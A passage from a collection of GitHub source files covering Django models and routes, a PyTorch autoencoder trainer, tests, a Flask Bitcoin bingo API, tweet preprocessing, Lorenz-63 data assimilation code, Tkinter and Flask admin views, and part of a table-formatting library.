('comments_closed', models.BooleanField(default=False, verbose_name='Comments closed')),\n ('comments_closed_by_staff', 
models.BooleanField(default=False, verbose_name='Comments closed by staff')),\n ('is_target_guild', models.BooleanField(default=False, verbose_name='Target guild')),\n ('slug', models.UUIDField(default=uuid.uuid4, unique=True)),\n ('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('source_realm', models.CharField(max_length=50, verbose_name='Source realm')),\n ('source_character', models.CharField(max_length=50, verbose_name='Source character')),\n ('destination_realm', models.CharField(max_length=50, verbose_name='Target realm', null=True)),\n ('destination_character', models.CharField(max_length=50, verbose_name='Target name', null=True)),\n ('destination_faction', models.PositiveSmallIntegerField(null=True, choices=[(0, 'Alliance'), (1, 'Horde'), (2, 'Neutral')], verbose_name='Faction')),\n ('winner_realm', models.CharField(max_length=50, blank=True, null=True, verbose_name='Winner realm')),\n ('winner_character', models.CharField(max_length=50, blank=True, null=True, verbose_name='Winner character')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-updated_date'],\n 'verbose_name_plural': 'bounties',\n },\n ),\n migrations.CreateModel(\n name='BountyImage',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('updated_date', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Latest update')),\n ('image', models.ImageField(storage=bountyomatic.storage.OverwriteStorage(), upload_to='bounties')),\n ('language', models.CharField(max_length=5, choices=[('en-us', 'English'), ('fr-fr', 'French')])),\n ('bounty', models.ForeignKey(to='bounties.Bounty')),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('text', models.TextField(verbose_name='Comment')),\n ('character_realm', models.CharField(max_length=50, verbose_name='Character realm')),\n ('character_name', models.CharField(max_length=50, verbose_name='Character name')),\n ('added_date', models.DateTimeField(db_index=True, auto_now_add=True, verbose_name='Creation date')),\n ('updated_date', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Latest update')),\n ('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('user_ip', models.GenericIPAddressField(blank=True, unpack_ipv4=True, null=True, verbose_name='IP address')),\n ('bounty', models.ForeignKey(to='bounties.Bounty')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-added_date'],\n 'verbose_name_plural': 'comments',\n },\n ),\n migrations.AlterUniqueTogether(\n name='bountyimage',\n unique_together=set([('bounty', 'language')]),\n ),\n migrations.AlterUniqueTogether(\n name='bounty',\n unique_together=set([('user', 'source_realm', 'source_character', 'destination_realm', 'destination_character')]),\n ),\n ]\n","repo_name":"toxinu/bounty-o-matic","sub_path":"bountyomatic/bounties/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73950055450","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom . 
import views\nfrom .api import BannerViewSet, ProjectViewSet, LogoViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'projects', ProjectViewSet, basename='project')\nrouter.register(r'banners', BannerViewSet, basename='banner')\nrouter.register(r'logos', LogoViewSet, basename='logos')\n\nurlpatterns = [\n path('api/', include(router.urls)),\n\n path('', views.project_list, name='project_list'),\n path('/', views.project_detail, name='project_detail'),\n path('create/', views.project_create, name='project_create'),\n path('/edit/', views.project_edit, name='project_edit'),\n path('delete//', views.project_delete, name='project_delete'),\n path('banner-images/', views.banner_image_list, name='banner_image_list'),\n path('banner-images/upload/', views.upload_banner_image, name='upload_banner_image'),\n path('banner-images/delete//', views.delete_banner_image, name='delete_banner_image'),\n #clients logos:\n path('logo-images/', views.logo_image_list, name='logo_image_list'),\n path('logo-images/upload/', views.upload_logo_images, name='upload_logo_images'),\n path('logo-images/delete//', views.delete_logo_images, name='delete_logo_images')\n\n]\n\n","repo_name":"dee-desu/rpsfinal","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22900158990","text":"import datetime\nfrom configs.config import Configuration\nfrom tools.console import Console\nfrom pathlib import Path\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom dataset.uvp_dataset import UvpDataset\nfrom models.classifier_cnn import count_parameters\nfrom models.autoencoder import ConvAutoencoder, ResNetCustom\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tools.utils import plot_loss, memory_usage\nfrom models.loss import FocalLoss, WeightedCrossEntropyLoss\nfrom tools.augmentation import GaussianNoise\nfrom torchvision.transforms import RandomHorizontalFlip, RandomRotation, RandomAffine\n\n\ndef train_autoencoder(config_path, input_path, output_path):\n\n    config = Configuration(config_path, input_path, output_path)\n\n    # Create output directory\n    input_folder = Path(input_path)\n    output_folder = Path(output_path)\n\n    console = Console(output_folder)\n    console.info(\"Training started ...\")\n\n    sampled_images_csv_filename = \"sampled_images.csv\"\n    input_csv = input_folder / sampled_images_csv_filename\n\n    if not input_csv.is_file():\n        console.error(\"The input csv file\", input_csv, \"does not exist.\")\n        console.quit(\"Input csv file does not exist.\")\n\n    time_str = str(datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"))\n    rel_training_path = Path(\"autoencoder_training\" + time_str)\n    training_path = output_folder / rel_training_path\n    config.training_path = training_path\n    if not training_path.exists():\n        training_path.mkdir(exist_ok=True, parents=True)\n    elif training_path.exists():\n        console.error(\"The output folder\", training_path, \"exists.\")\n        console.quit(\"Folder exists, not overwriting previous results.\")\n\n    # Save configuration file\n    output_config_filename = training_path / \"config.yaml\"\n    config.write(output_config_filename)\n\n    # Define data transformations\n    transform = transforms.Compose([\n        
transforms.Resize((config.sampling.target_size[0], config.sampling.target_size[1])),\n RandomHorizontalFlip(),\n RandomRotation(degrees=15),\n RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.8, 1.2), shear=15),\n GaussianNoise(std=0.1),\n transforms.ToTensor(),\n ])\n\n # Create uvp dataset datasets for training and validation\n train_dataset = UvpDataset(root_dir=input_folder,\n num_class=config.sampling.num_class,\n csv_file=input_csv,\n transform=transform,\n phase='train')\n\n class_counts = train_dataset.data_frame['label'].value_counts().sort_index().tolist()\n total_samples = sum(class_counts)\n class_weights = [total_samples / (config.sampling.num_class * count) for count in class_counts]\n class_weights_tensor = torch.FloatTensor(class_weights)\n class_weights_tensor = class_weights_tensor / class_weights_tensor.sum()\n\n # Create data loaders\n train_loader = DataLoader(train_dataset,\n batch_size=config.autoencoder.batch_size,\n shuffle=True)\n\n device = torch.device(f'cuda:{config.base.gpu_index}' if\n torch.cuda.is_available() and config.base.cpu is False else 'cpu')\n console.info(f\"Running on: {device}\")\n\n if config.autoencoder.architecture_type == 'conv_autoencoder':\n model = ConvAutoencoder(latent_dim=config.autoencoder.latent_dim,\n input_size=config.sampling.target_size,\n gray=config.autoencoder.gray)\n\n elif config.autoencoder.architecture_type == 'resnet18':\n model = ResNetCustom(num_classes=config.sampling.num_class,\n latent_dim=config.autoencoder.latent_dim,\n gray=config.autoencoder.gray)\n\n else:\n console.quit(\"Please select correct parameter for architecture_type\")\n\n # Loss criterion and optimizer\n if config.autoencoder.loss == 'cross_entropy':\n criterion = nn.CrossEntropyLoss()\n elif config.autoencoder.loss == 'cross_entropy_weight':\n class_weights_tensor = class_weights_tensor.to(device)\n criterion = WeightedCrossEntropyLoss(weight=class_weights_tensor)\n elif config.autoencoder.loss == 'focal':\n criterion = FocalLoss(alpha=1, gamma=2)\n elif config.autoencoder.loss == 'mse':\n criterion = nn.MSELoss()\n\n # Calculate the number of parameters in millions\n num_params = count_parameters(model) / 1_000_000\n console.info(f\"The model has approximately {num_params:.2f} million parameters.\")\n\n model.to(device)\n\n # test memory usage\n console.info(memory_usage(config, model, device))\n\n # Loss criterion and optimizer\n optimizer = optim.Adam(model.parameters(), lr=config.autoencoder.learning_rate)\n\n loss_values = []\n\n # Training loop\n for epoch in range(config.autoencoder.num_epoch):\n model.train()\n running_loss = 0.0\n\n for images, labels, _ in train_loader:\n images, labels = images.to(device), labels.to(device)\n\n if config.autoencoder.architecture_type == 'conv_autoencoder':\n labels = images\n\n optimizer.zero_grad()\n outputs, _ = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n average_loss = running_loss / len(train_loader)\n loss_values.append(average_loss)\n console.info(f\"Epoch [{epoch + 1}/{config.autoencoder.num_epoch}] - Loss: {average_loss:.4f}\")\n\n # save intermediate weight\n if (epoch + 1) % config.autoencoder.save_model_every_n_epoch == 0:\n # Save the model weights\n saved_weights = f'model_weights_epoch_{epoch + 1}.pth'\n saved_weights_file = training_path / saved_weights\n\n console.info(f\"Model weights saved to {saved_weights_file}\")\n torch.save(model.state_dict(), saved_weights_file)\n\n # Create a plot of the loss 
values\n plot_loss(loss_values, num_epoch=config.autoencoder.num_epoch, training_path=config.training_path)\n\n # Save the model's state dictionary to a file\n saved_weights = \"model_weights_final.pth\"\n saved_weights_file = training_path / saved_weights\n\n torch.save(model.state_dict(), saved_weights_file)\n\n console.info(f\"Final model weights saved to {saved_weights_file}\")\n\n\n\n\n\n","repo_name":"Mojtabamsd/PlanktonFusion","sub_path":"feature_extraction/train_autoencoder.py","file_name":"train_autoencoder.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36628399225","text":"\"Test the about API endpoints.\"\n\nimport http.client\n\nimport base\n\n\nclass About(base.Base):\n \"Test the about API endpoint.\"\n\n def test_software(self):\n \"Get software API JSON.\"\n url = f\"{base.SETTINGS['ROOT_URL']}/about/software\"\n response = self.GET(url)\n self.check_schema(response)\n\n\nif __name__ == '__main__':\n base.run()\n","repo_name":"pekrau/webapp-flask-sqlite3-template","sub_path":"test/test_about.py","file_name":"test_about.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"4956387648","text":"'''\"浏览商品浏览\n所有商品\"\t汪里\n'''\n# 导入模块\nfrom page.goods_view import GoodView, url\nfrom common.base import open_browser\n\nimport unittest, time\n\n# 定义浏览商品测试用例类\nclass TestGoodsView(unittest.TestCase):\n # 编写test fixture\n def setUp(self) -> None:\n # 用户前置条件\n # 打开浏览器\n driver = open_browser('firefox')\n # 浏览商品类实例化\n self.goodsview = GoodView(driver)\n # 输入网址\n self.goodsview.open_url(url)\n\n def tearDown(self) -> None:\n # 关闭浏览器\n time.sleep(4)\n self.goodsview.close()\n \n # 编写test case\n def test_view(self):\n '''浏览商品测试用例:浏览所有商品'''\n self.goodsview.view_all()\n\n\n# 测试代码\nif __name__ == '__main__':\n unittest.main()","repo_name":"tianchuntian/beauty_shop","sub_path":"script/test_c_goods_view.py","file_name":"test_c_goods_view.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30880501193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jorge Niedbalski R. 
'\n\nfrom bitbingo.common.app import app\nfrom bitbingo.common.model import (Game,\n Player,\n Deposit,\n Token)\n\nfrom flask.ext.login import (login_required, current_user, login_user,\n logout_user)\nfrom flask.ext.restful import (Resource, Api, marshal_with, fields,\n marshal_with,\n marshal, abort)\nfrom flask.ext.restful import reqparse\n\nimport re\nimport json\nimport requests\nimport urllib\n\n\napi = Api(app, prefix=\"/api/v1\")\n\n\n#TODO: move this to a helper class\ndef marshal_and_count(n, r, f=None, **other):\n if not isinstance(r, list):\n r = [r]\n\n if f:\n r = map(lambda q: marshal(q, f), r)\n\n d = dict({'count': len(r), '%s' % n: r})\n for k, v in other.items():\n d.update({k: v})\n return d\n\n\nclass FieldValueError(ValueError):\n\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n ValueError.__init__(self)\n\n def __str__(self):\n return json.dumps({\n 'field': self.name,\n 'value': self.value\n })\n\n\ndef wallet_is_valid(value, name, *args):\n wallet_regex = '^[13][1-9A-HJ-NP-Za-km-z]{26,33}'\n\n if not re.match(wallet_regex, value):\n raise FieldValueError(name,\n \"Bitcoin wallet format is incorrect\")\n\n if Player.select().where(Player.wallet == value).count() > 0:\n raise FieldValueError(name,\n \"Bitcoin wallet already is used by another user\")\n return value\n\n\nclass AuthResource(Resource):\n player_fields = {\n 'id': fields.Integer,\n 'created': fields.DateTime,\n 'wallet': fields.String,\n 'balance': fields.Float\n }\n\n @marshal_with(player_fields)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"wallet\",\n type=str,\n required=True)\n parser.add_argument(\"password\",\n type=str,\n required=True)\n\n args = parser.parse_args()\n try:\n player = Player.login(args.get('wallet'), args.get('password'))\n except:\n return abort(404, message=\"Invalid provided credentials\")\n\n login_user(player, remember=True)\n return player\n\n\nclass DepositResource(Resource):\n deposit_to_fields = {\n 'ready': fields.String(attribute='paid'),\n 'amount': fields.Float,\n 'address': fields.String(attribute=\"input_address\")\n }\n\n def generate_wallet(self, token):\n parameters = {\n \"method\": \"create\",\n \"address\": app.config.get(\"WALLET_ADDRESS\"),\n \"callback\": \"http://bitbi.io/api/v1/deposit?token=%s\" % token.value\n }\n\n result = requests.get(\n \"https://blockchain.info/api/receive?%s\" %\n urllib.urlencode(parameters))\n\n if not result.status_code in (200, ):\n raise Exception('Invalid response code %s' % result.status_code)\n\n return result.json()\n\n @login_required\n @marshal_with(deposit_to_fields)\n def post(self, *args, **kwargs):\n parser = reqparse.RequestParser()\n parser.add_argument(\"amount\",\n type=str,\n required=True)\n args = parser.parse_args()\n\n deposit = Deposit()\n deposit.amount = args.get('amount', 0.0)\n deposit.token = Token.random()\n deposit.player = current_user.id\n\n wallet = self.generate_wallet(deposit.token)\n\n deposit.fee_percent = wallet.get('fee_percent', 0.0)\n deposit.input_address = wallet.get('input_address')\n\n deposit.save()\n return deposit\n\n\nclass PlayerResource(Resource):\n player_fields = {\n 'id': fields.Integer,\n 'created': fields.DateTime,\n 'wallet': fields.String,\n 'balance': fields.Float\n }\n\n @marshal_with(player_fields)\n def get(self):\n if not current_user.is_authenticated():\n return app.login_manager.unauthorized()\n return current_user\n\n def delete(self):\n if not current_user.is_authenticated():\n return abort(404, 
\"Player is not logged in\")\n logout_user()\n return \"User logged out\"\n\n @marshal_with(player_fields)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"wallet\",\n type=wallet_is_valid,\n required=True)\n\n parser.add_argument(\"password\",\n type=str,\n required=True)\n\n parser.add_argument(\"confirmation\",\n type=str,\n required=True)\n\n parser.add_argument(\"email\",\n type=str,\n default=None,\n required=False)\n\n args = parser.parse_args()\n\n player = Player()\n player.wallet = args.get('wallet')\n player.set_password(args.get('password'))\n\n player.email = args.get('email')\n player.active = True\n\n player.save()\n login_user(player, remember=True)\n\n return player\n\n\nclass ResultsResource(Resource):\n\n #TODO: move this to a fields class\n results_fields = {\n 'id': fields.Integer,\n 'random': fields.Float,\n 'created': fields.DateTime,\n 'scheduled_at': fields.DateTime,\n 'winner': fields.String,\n 'amount': fields.Float,\n 'players': fields.Float\n }\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"limit\", type=int, default=0)\n args = parser.parse_args()\n\n bets = [bet for bet in Game.get_recent_bets(\n limit=args.get(\"limit\", 0))]\n\n return marshal_and_count('results',\n bets,\n f=self.results_fields)\n\napi.add_resource(ResultsResource, '/result')\napi.add_resource(PlayerResource, '/player')\napi.add_resource(DepositResource, '/deposit')\napi.add_resource(AuthResource, '/player/login',\n methods=['POST', 'DELETE'])\n","repo_name":"niedbalski/bitbingo","sub_path":"bitbingo/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29098290118","text":"import nltk\nimport string\nfrom utility import constants, toggles\n\n\npunctuation_set = set(string.punctuation)\nstopwords_set = set(nltk.corpus.stopwords.words('english'))\nstemmer = nltk.stem.snowball.SnowballStemmer('english')\ntwitter_tokenizer = nltk.tokenize.TweetTokenizer(reduce_len=3)\n\nif toggles['stopwords_ignore_negation']:\n for w in constants['stopwords_negation']:\n stopwords_set.remove(w)\nstopwords_set.add('RT')\n\n\ndef process_tweet(json_data):\n \"\"\"Returns a dictionary with two keys `stemmed` and `user.\n\n `stemmed` contains the text to be processed upon.\n `user` contains the user data of the tweet owner.\n \"\"\"\n text = json_data.get('text')\n\n # Strip URLs.\n for url in json_data.get('entities').get('urls', []):\n text = text.replace(url.get('url', ''), 'http')\n\n # Tokenize text.\n tokens = twitter_tokenizer.tokenize(text)\n\n # Remove punctuation and stopwords.\n tokens = [x for x in tokens if x not in punctuation_set and x not in stopwords_set]\n\n # Stem the tokens.\n if toggles['stem_tokens']:\n tokens = [stemmer.stem(x) for x in tokens]\n\n result = {}\n result['stemmed'] = tokens\n result['user'] = json_data.get('user')\n\n return result\n","repo_name":"seokhoonlee/stock-analysis-tool","sub_path":"app/sentiment_analysis/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29911541677","text":"\ndef tic_tac_toe(bd):\n d = {'X':'1', 'O':'2'}\n lor = []\n for row in bd:\n lor.append(row)\n tbd = map(list, zip(*bd))\n for row in tbd:\n lor.append(row)\n lor.append([bd[0][0], bd[1][1], bd[2][2]])\n lor.append([bd[0][2], bd[1][1], bd[2][0]])\n \n for row in lor:\n 
if row[0] in d and row[0] == row[1] == row[2]:  # guard: a line of empty cells has no winner\n            return 'Player ' + d[row[0]] + ' wins'\n    return \"It's a Tie\"\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"5Q2RRBNJ8KcjCkPwP_23.py","file_name":"5Q2RRBNJ8KcjCkPwP_23.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8147787419","text":"#%%\n#!/usr/bin/env python\n# coding: utf-8\n\n# Initialization. Load the required modules\n\n\n#Import all the modules that will be used in this notebook\nfrom tqdm import tqdm\n\nimport numpy as np\nimport Lorenz_63 as model\nimport Lorenz_63_DA as da\n\nimport sys\nsys.path.append(\"../Lorenz_96/data_assimilation/\")\nfrom da import common_pf as pf\n\n\n#Select here the observation operator to be used.\nfrom Lorenz_63_ObsOperator import forward_operator_onlyx as forward_operator\nfrom Lorenz_63_ObsOperator import forward_operator_onlyx_tl as forward_operator_tl\n\nnp.random.seed(10)\n\n#------------------------------------------------------------\n# Specify the parameters the model will use\n#------------------------------------------------------------\na = 10.0 # standard L63 10.0 \nr = 28.0 # standard L63 28.0\nb = 8.0/3.0 # standard L63 8.0/3.0\n\np=np.array([a,r,b])\ndt=0.01 # Time step for the integration of the Lorenz model\nx0=np.array([ 8.0 , 0.0 , 30.0 ]) # Initial conditions for the spin-up of the nature run (do not change)\nnumtrans=600 # Spin-up time to generate the nature run (do not change)\n\n#------------------------------------------------------------\n# Configuration of the assimilation system\n#------------------------------------------------------------\ndx0 = 1.0*np.array([ 5.0 , 5.0 , 5.0 ]) # Initial error of the estimate. \nR0=8.0 # Variance of the observation error.\nnvars=3\nEnsSize=30 #Number of ensemble members.\n\nnobs=np.size(forward_operator(np.array([0,0,0])))\n\n#Define the observation error matrix\nR=R0*np.identity(nobs) #In this formulation we assume that the errors \n                       #in different observations are all equal and \nP0=10.0*np.array([[0.6 , 0.5 , 0.0 ],[0.5 , 0.6 , 0.0 ],[0.0 , 0.0 , 1.0 ]])\n\nlam = 40.0\n\nx=np.copy(x0)\nfor i in range(numtrans) :\n    x = model.forward_model( x , p , dt )\n    \n# Integrate the true simulation (nature run)\n# The result is stored in a numpy array \"state\" with dimension (numstep,3)\n\nyo = forward_operator( x ) + np.random.multivariate_normal(np.array([0]),R)\n
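Each ensemble member below is drawn as the spun-up state plus the fixed first-guess error dx0 plus correlated Gaussian noise with covariance P0. A tiny illustration of that sampling step with the same shapes (the values here are illustrative):

import numpy as np
rng = np.random.default_rng(0)
P0_demo = np.array([[0.6, 0.5, 0.0],
                    [0.5, 0.6, 0.0],
                    [0.0, 0.0, 1.0]])
state = np.array([8.0, 0.0, 30.0])
# state + fixed bias + one correlated Gaussian draw = one perturbed member
member = state + np.array([5.0, 5.0, 5.0]) + rng.multivariate_normal(np.zeros(3), P0_demo)
print(member)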
\n#We initialize the cycle from the \"climatological\" mean of the system. That is, we have no precise\n#information about where the system is at the initial time.\n\nstatefens=np.zeros((nvars,EnsSize))\n\nfor iens in range( EnsSize ) :\n    statefens[:,iens] = np.nanmean( x , 0 ) + dx0 + np.random.multivariate_normal(np.zeros(nvars),P0)\n    \n\n#Compute the optimal transport matrix.\n#from emd import emd\nfrom scipy.spatial.distance import cdist\nimport ot\n \n \n \n#Compute the inverse of the covariance matrix \nRinv = np.linalg.inv(R)\n \n#Compute the weights based on the likelihood of the observations \n#given each of the particles.\nw=np.zeros( EnsSize )\nfor iens in range( EnsSize ) :\n    yf = forward_operator( statefens[:,iens] )\n    w[iens] = np.exp( -0.5 * np.matmul( (yo-yf).transpose() , np.matmul( Rinv , yo - yf ) ) )\n\n#Normalize the weights so they sum to 1.\nw = w / np.sum(w)\n \n\n \n#Compute the weights as in the fortran routine\nw2=np.zeros(EnsSize)\nfor iens in range(EnsSize) :\n    yf = forward_operator( statefens[:,iens] )\n    w2[iens]=w2[iens] - 0.5*( (yo-yf)**2 ) * Rinv \n\n    \n    #Normalize the log of the weights (to avoid underflow issues)\nlog_w_sum = da.log_sum_vec(w2)\n\nfor iens in range(EnsSize) :\n\n    w2[iens] = np.exp( w2[iens] - log_w_sum )\n    #w2[iens] = np.exp(w2[iens])\n\n#Normalize the weights so they sum to 1.\nw2 = w2 / np.sum(w2)\n\nimport matplotlib.pyplot as plt\nplt.plot(w2);plt.plot(w)\n\n\n\n\n\n\n","repo_name":"gustfrontar/DABA","sub_path":"Lorenz_63/test_w_computation.py","file_name":"test_w_computation.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
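The record above normalizes the log-weights with da.log_sum_vec before exponentiating, which avoids underflow when the quadratic misfits are large. A self-contained sketch of that log-sum-exp trick; scipy's logsumexp stands in here for the repo's own helper:

import numpy as np
from scipy.special import logsumexp

log_w = np.array([-1200.0, -1201.0, -1250.0])  # np.exp(log_w) alone underflows to 0
w = np.exp(log_w - logsumexp(log_w))           # subtract the log of the sum first
print(w, w.sum())                              # finite weights that sum to 1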
 +{"seq_id":"38936392242","text":"# Displaying .jpg Image using labels\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\n\nroot = Tk()\nroot.geometry(\"1024x612\")\nroot.resizable(0, 0) # Fix the size\n\nimage = Image.open(\"A:\\\\Python GUI Development\\\\Python Tkinter\\\\Required Images\\\\1.jpg\")\nphoto = ImageTk.PhotoImage(image)\n\nMylabel = Label(image=photo)\nMylabel.pack()\n\nroot.mainloop()\n\n","repo_name":"HARIOM317/Programing-languages-and-source-code","sub_path":"Development/Python GUI Development/Python Tkinter/5_ Label (Display .jpg image).py","file_name":"5_ Label (Display .jpg image).py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11387900487","text":"# coding: utf-8\nfrom flask import render_template, request, redirect, url_for\nfrom optico import app, db, images\nfrom optico.models import Mtype, Stype\nfrom optico.utils import check_admin\n\n\n@app.route('/mtype/<int:mtype_id>')\ndef mtype(mtype_id):\n    \"\"\"Page: main product type\"\"\"\n    mt = Mtype.query.get_or_404(mtype_id)\n    ps = Mtype.query.order_by(Mtype.show_order).all()\n    return render_template('type/mtype.html', mt=mt, ps=ps)\n\n\n@app.route('/mtype/add', methods=['GET', 'POST'])\ndef add_mtype():\n    \"\"\"Page: add main product type\"\"\"\n    check_admin()\n    if request.method == 'GET':\n        return render_template('type/add_mtype.html')\n    elif request.method == 'POST':\n        # Save image\n        max_id = db.session.query(db.func.max(Mtype.id).label('max_id')).one().max_id\n        filename = images.save(request.files['image'], name='m%s.' % str(max_id + 1))\n\n        # Add mtype\n        mtype = Mtype(name=request.form['name'], image=filename, show_order=request.form['order'])\n        db.session.add(mtype)\n        db.session.commit()\n        return redirect(url_for('home'))\n\n\n@app.route('/maintype/edit/<int:mtype_id>', methods=['GET', 'POST'])\ndef edit_mtype(mtype_id):\n    \"\"\"Page: edit main product type\"\"\"\n    check_admin()\n    mt = Mtype.query.get_or_404(mtype_id)\n    if request.method == 'GET':\n        return render_template('type/edit_mtype.html', mt=mt)\n    else:\n        # Delete old image\n        # TODO\n\n        # Save new image\n        image = request.files['image']\n        if image.filename:\n            filename = images.save(image, name='m%s.' % str(mtype_id))\n            mt.image = filename\n\n        # Update mtype\n        mt.name = request.form['name']\n        mt.show_order = request.form['show_order']\n        db.session.add(mt)\n        db.session.commit()\n        return redirect(url_for('home'))\n\n\n@app.route('/mtype/<int:mtype_id>/delete')\ndef delete_mtype(mtype_id):\n    \"\"\"Proc: delete main product type\"\"\"\n    check_admin()\n\n    # Try to delete img file\n    # TODO\n\n    mtype = Mtype.query.get_or_404(mtype_id)\n    db.session.delete(mtype)\n    db.session.commit()\n    return redirect(url_for('home'))\n\n\n@app.route('/stype/<int:stype_id>')\ndef stype(stype_id):\n    \"\"\"Page: sub product type\"\"\"\n    st = Stype.query.get_or_404(stype_id)\n    ps = Mtype.query.order_by(Mtype.show_order).all()\n    return render_template('type/stype.html', st=st, ps=ps)\n\n\n@app.route('/stype/add', methods=['GET', 'POST'])\ndef add_stype():\n    \"\"\"Page: add sub product type\"\"\"\n    check_admin()\n    if request.method == 'GET':\n        mtypes = Mtype.query.order_by(Mtype.show_order).all()\n        return render_template('type/add_stype.html', mtypes=mtypes)\n    elif request.method == 'POST':\n        stype = Stype(mtype_id=request.form['mtype_id'], name=request.form['name'], show_order=request.form['show_order'])\n        db.session.add(stype)\n        db.session.commit()\n        return redirect(url_for('stype', stype_id=stype.id))\n\n\n@app.route('/stype/<int:stype_id>/edit', methods=['GET', 'POST'])\ndef edit_stype(stype_id):\n    \"\"\"Page: edit sub product type\"\"\"\n    check_admin()\n    st = Stype.query.get_or_404(stype_id)\n    if request.method == 'GET':\n        mtypes = Mtype.query.order_by(Mtype.show_order).all()\n        return render_template('type/edit_stype.html', st=st, mtypes=mtypes)\n    elif request.method == 'POST':\n        st.mtype_id = request.form['mtype_id']\n        st.name = request.form['name']\n        st.show_order = request.form['show_order']\n        db.session.add(st)\n        db.session.commit()\n        return redirect(url_for('stype', stype_id=stype_id))\n\n\n@app.route('/subtype/delete/<int:stype_id>')\ndef delete_stype(stype_id):\n    \"\"\"Proc: delete sub product type\"\"\"\n    check_admin()\n    stype = Stype.query.get_or_404(stype_id)\n    db.session.delete(stype)\n    db.session.commit()\n    return redirect(url_for('home'))","repo_name":"hustlzp/optico","sub_path":"optico/controllers/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
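The views in the record above rely on Flask's `<int:...>` URL converters (restored here from the view signatures, where the extraction had stripped the angle-bracketed segments): the matched path segment is parsed to an integer and passed as the view argument, and non-numeric ids 404 before the view runs. A minimal sketch of the pattern; the app and route are illustrative, not part of the record:

from flask import Flask

app = Flask(__name__)

@app.route('/mtype/<int:mtype_id>')
def mtype(mtype_id):
    # mtype_id arrives as an int, already validated by the converter
    return 'mtype %d' % mtype_id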
 +{"seq_id":"6024766770","text":"import collections\nimport fnmatch\nfrom typing import List, Tuple, Optional\n\nimport monotable.plugin\nimport monotable.alignment\n\nMonoTableConfig = collections.namedtuple('MonoTableConfig',\n                                         ['align_spec_chars',\n                                          'sep',\n                                          'format_func',\n                                          'format_func_map',\n                                          'option_spec_delimiters'\n                                          ]\n                                         )\n\"\"\"Copy of selected MonoTable instance and class variables.\"\"\"\n\n\nclass FormatScanner:\n    \"\"\"Scans a format string for align, format_spec, and format directives.\n\n    The format string takes the form [align_spec][directives][format_spec].\n    See formats description in MonoTable.__init__().\n\n    The option_spec may select a format function and may select other options.\n\n    The format functions in monotable.plugin.format_functions\n    are selectable using an option_spec in addition to any supplied by\n    format_func_map.\n\n    An example usage:\n\n    >>> import monotable\n    >>> def my_format_func(value, format_spec):\n    ...     pass\n\n    >>> align_spec = '<'\n    >>> directives = '(width=17;wrap;sep= | ;my_format)'\n    >>> format_spec = '.0f'\n    >>> format_str = align_spec + directives + format_spec\n    >>> config = monotable.scanner.MonoTableConfig(\n    ...        align_spec_chars='<^>',\n    ...        sep='  ',\n    ...        format_func=format,    # the built-in format function\n    ...        format_func_map= {'my_format': my_format_func},\n    ...        option_spec_delimiters='(;)')\n\n    >>> formatobj = monotable.scanner.FormatScanner(format_str, config)\n\n    # formatobj has these attributes:\n    >>> assert formatobj.error_text == ''    # indicates no scanning errors\n\n    # enumeration value for '<'\n    >>> assert formatobj.align == monotable.alignment.LEFT\n\n    # overrides config.format_func\n    >>> assert formatobj.format_func == my_format_func\n    >>> assert formatobj.format_spec == '.0f'\n    >>> assert formatobj.width == 17\n    >>> assert formatobj.fixed is False\n    >>> assert formatobj.wrap is True\n    >>> assert formatobj.sep == ' | '    # overrides config.sep\n\n    